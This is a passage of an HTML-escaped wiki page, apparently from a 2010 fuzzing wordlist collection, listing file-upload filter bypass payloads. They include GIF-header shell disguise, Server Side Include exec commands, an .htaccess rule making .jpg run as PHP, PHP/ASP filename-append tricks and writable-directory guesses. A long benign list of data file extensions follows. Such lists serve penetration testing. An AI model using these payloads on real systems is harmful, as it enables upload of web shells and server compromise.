# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable directories File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
